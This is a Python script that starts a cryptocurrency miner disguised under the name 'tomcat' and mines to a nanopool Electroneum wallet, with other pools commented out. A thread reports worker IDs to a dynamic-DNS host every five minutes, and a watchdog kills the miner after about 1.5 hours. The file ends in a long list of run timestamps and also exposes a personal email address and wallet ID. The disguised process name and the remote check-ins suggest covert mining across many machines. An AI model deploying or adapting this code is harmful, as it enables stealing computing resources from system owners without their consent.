import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:07:06.607036
#2018-02-17 16:54:06.176120
#2018-02-17 18:41:01.170504
#2018-02-17 20:28:06.489538
#2018-02-17 22:16:06.413398
#2018-02-18 00:00:06.831999
#2018-02-18 01:50:07.192860
#2018-02-18 03:38:04.422326
#2018-02-18 05:25:07.190856
#2018-02-18 07:17:05.517883
#2018-02-18 09:04:03.192703
#2018-02-18 10:51:06.336320
#2018-02-18 12:37:07.670814
#2018-02-18 14:23:01.932637
#2018-02-18 16:14:05.271711
#2018-02-18 18:02:07.120314
#2018-02-18 19:49:04.756148
#2018-02-18 21:37:04.725503
#2018-02-18 23:25:07.375243
#2018-02-19 01:12:06.827618
#2018-02-19 02:59:05.621182
#2018-02-19 04:46:07.246862
#2018-02-19 06:29:05.161065
#2018-02-19 08:19:03.979401
#2018-02-19 10:07:07.810347
#2018-02-19 11:56:07.451877
#2018-02-19 13:42:07.834258
#2018-02-19 15:32:01.459663
#2018-02-19 17:20:10.431481
#2018-02-19 19:09:07.133142
#2018-02-19 20:54:08.054740
#2018-02-19 22:43:06.893162
#2018-02-20 00:26:01.967147
#2018-02-20 02:14:05.930566
#2018-02-20 04:05:08.621616
#2018-02-20 05:48:01.282351
#2018-02-20 07:33:02.126741
#2018-02-20 09:17:07.135311
#2018-02-20 11:01:08.254855
#2018-02-20 12:48:04.058171
#2018-02-20 14:32:09.396159
#2018-02-20 16:17:07.740293
#2018-02-20 18:05:07.867484
#2018-02-20 19:57:04.360691
#2018-02-20 21:44:08.656885
#2018-02-20 23:26:05.745593
#2018-02-21 01:09:03.968516
#2018-02-21 02:55:03.759793
#2018-02-21 04:45:02.496701
#2018-02-21 06:33:07.248706
#2018-02-21 08:18:02.080480
#2018-02-21 10:04:08.475144
#2018-02-21 11:51:09.725271
#2018-02-21 13:42:01.775538
#2018-02-21 15:26:09.781381
#2018-02-21 17:17:02.039740
#2018-02-21 19:04:09.750960
#2018-02-21 20:52:04.581498
#2018-02-21 22:37:04.483133
#2018-02-22 00:27:03.926146
#2018-02-22 02:14:05.520504
#2018-02-22 03:59:05.610187
#2018-02-22 05:46:08.252397
#2018-02-22 07:31:08.070655
#2018-02-22 09:21:04.764467
#2018-02-22 11:07:04.541059
#2018-02-22 12:52:05.536786
#2018-02-22 14:38:09.330039
#2018-02-22 16:23:04.757289
#2018-02-22 18:10:09.703956
#2018-02-22 19:58:04.935501
#2018-02-22 21:47:06.524985
#2018-02-22 23:35:09.442968
#2018-02-23 01:23:05.703888
#2018-02-23 03:09:04.502958
#2018-02-23 04:55:03.717062
#2018-02-23 06:40:08.941989
#2018-02-23 08:29:05.780963
#2018-02-23 10:43:05.203798
#2018-02-23 12:39:08.536158
#2018-02-23 14:24:09.163691
#2018-02-23 16:15:11.980562
#2018-02-23 18:02:08.531155
#2018-02-23 19:47:07.938412
#2018-02-23 21:29:07.984181
#2018-02-23 23:18:02.192926
#2018-02-24 01:08:05.212029
#2018-02-24 02:59:01.698907
#2018-02-24 06:13:07.190706
#2018-02-24 08:01:06.221388
#2018-02-24 09:45:07.159923
#2018-02-24 11:39:06.623410
#2018-02-24 13:29:07.436816
#2018-02-24 15:18:05.341464
#2018-02-24 17:07:07.436657
#2018-02-24 18:59:05.230160
#2018-02-24 20:46:06.110609
#2018-02-24 23:01:07.113979
#2018-02-25 02:18:05.612361
#2018-02-25 05:59:05.235847
#2018-02-25 11:39:01.946374